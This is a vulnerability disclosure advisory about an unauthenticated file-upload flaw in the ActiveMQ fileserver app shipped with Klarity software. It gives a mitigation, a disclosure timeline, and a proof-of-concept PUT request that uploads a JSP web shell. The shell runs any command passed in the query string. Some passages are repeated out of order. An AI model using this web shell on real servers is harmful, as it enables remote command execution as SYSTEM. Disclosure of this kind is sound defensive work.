This vulnerability can be chained with another vulnerability to allow fully unauthenticated remote attackers to execute arbitrary commands on the server running the vulnerable software as NT AUTHORITY\SYSTEM.
PUT /fileserver/stage1.jsp HTTP/1.1
Host: $IPADDR:8161
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 536
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<html>
<head><title>TEST PAGE</title></head>
<body>
<%
try {
Process proc = java.lang.Runtime.getRuntime().exec(URLDecoder.decode("cmd /c " + request.getQueryString().split("=")[1].toString()));
java.io.BufferedReader stdInput = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream()));
String s = null;
while ((s = stdInput.readLine()) != null) {
out.println(s);
}
} catch (Exception e) { out.println(e.toString()); }
%>
</body>
</html>
If possible, remove the C:\Klarity\Apache_ActiveMQ\webapps\fileserver folder entirely.
Vulnerability Description:
The Fileserver web app installed in
C:\Klarity\Apache_ActiveMQ\webapps\fileserver\from version 3.6.0.35 has a flaw that allows an unauthenticated remote attacker to drop files into thefileserver\directory with a PUT request tohttp://$IP:8161/fileserver.This vulnerability can be chained with another vulnerability to allow fully unauthenticated remote attackers to execute arbitrary commands on the server running the vulnerable software as
NT AUTHORITY\SYSTEM.Proof of Concept:
Send the following unauthenticated request to the server running the software:
Verify that the file now exists in the
fileserver\directory.Mitigation:
If possible, remove the C:\Klarity\Apache_ActiveMQ\webapps\fileserver folder entirely.
Timeline:
Disclosed: May 12, 2021
Acknowledged: May 13, 2021
Fixed: N/A
No fix from vendor in the Vulnerability Disclosure Program timeline